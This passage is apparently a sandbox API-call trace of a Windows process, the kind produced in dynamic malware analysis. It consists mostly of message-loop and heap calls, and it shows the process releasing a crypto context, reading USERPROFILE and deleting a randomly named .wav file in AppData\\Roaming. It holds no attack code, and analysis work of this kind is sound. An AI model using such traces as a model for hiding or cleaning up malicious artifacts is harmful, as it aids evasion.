hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0121.848] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0121.848] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0121.848] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0121.848] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0121.848] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0121.848] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0121.848] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0121.848] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0121.854] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.854] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0121.854] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.854] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0121.854] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0121.854] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.855] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0121.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.855] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0121.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.855] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0121.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.855] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0121.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.855] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.855] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0121.855] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.855] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0121.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.855] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.855] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0121.856] CryptReleaseContext (hProv=0x9bf088, dwFlags=0x0) returned 1 [0121.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.856] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0121.856] FreeLibrary (hLibModule=0x76390000) returned 1 [0121.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.856] CloseHandle (hObject=0x4f4) returned 1 [0121.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.885] CloseHandle (hObject=0x4f0) returned 1 [0121.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.888] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.888] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0121.888] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0121.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0121.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0121.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a68440 [0121.889] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bNDu1R0FYJg.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\bNDu1R0FYJg.wav", lpFilePart=0x8cedf4*="bNDu1R0FYJg.wav") returned 0x2f [0121.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0121.889] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bNDu1R0FYJg.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bndu1r0fyjg.wav")) returned 0x20 [0121.889] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bNDu1R0FYJg.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd69521b0, ftCreationTime.dwHighDateTime=0x1d5cc2d, ftLastAccessTime.dwLowDateTime=0x7b660ee0, ftLastAccessTime.dwHighDateTime=0x1d5d771, ftLastWriteTime.dwLowDateTime=0x7b660ee0, ftLastWriteTime.dwHighDateTime=0x1d5d771, nFileSizeHigh=0x0, nFileSizeLow=0x9ff1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="bNDu1R0FYJg.wav", cAlternateFileName="BNDU1R~1.WAV")) returned 0x9a47c0 [0121.889] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bNDu1R0FYJg.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bndu1r0fyjg.wav")) returned 1 [0121.891] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd69521b0, ftCreationTime.dwHighDateTime=0x1d5cc2d, ftLastAccessTime.dwLowDateTime=0x7b660ee0, ftLastAccessTime.dwHighDateTime=0x1d5d771, ftLastWriteTime.dwLowDateTime=0x7b660ee0, ftLastWriteTime.dwHighDateTime=0x1d5d771, nFileSizeHigh=0x0, nFileSizeLow=0x9ff1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="bNDu1R0FYJg.wav", cAlternateFileName="BNDU1R~1.WAV")) returned 0 [0121.891] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0121.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0121.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0121.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0121.891] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0121.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0121.891] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0121.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.892] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0121.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a68440 [0121.893] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bNDu1R0FYJg.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\bNDu1R0FYJg.wav", lpFilePart=0x8cf650*="bNDu1R0FYJg.wav") returned 0x2f [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0121.893] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\bNDu1R0FYJg.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bndu1r0fyjg.wav")) returned 0xffffffff [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.893] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0121.893] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.894] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0121.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 